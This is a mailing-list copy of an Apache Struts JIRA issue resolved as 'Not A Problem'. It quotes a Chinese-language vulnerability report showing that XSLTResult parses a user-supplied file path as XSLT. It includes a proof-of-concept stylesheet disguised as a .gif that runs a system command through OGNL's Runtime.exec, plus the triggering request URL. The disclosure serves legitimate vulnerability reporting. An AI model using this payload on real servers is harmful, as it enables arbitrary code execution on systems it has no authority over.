You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "Rene Gielen (Resolved) (JIRA)" <ji...@apache.org> on 2012/03/23 09:15:27 UTC
[jira] [Resolved] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Rene Gielen resolved WW-3782.
-----------------------------
Resolution: Not A Problem
In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Minor
> Labels: patch
> Fix For: 2.3.2
>
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira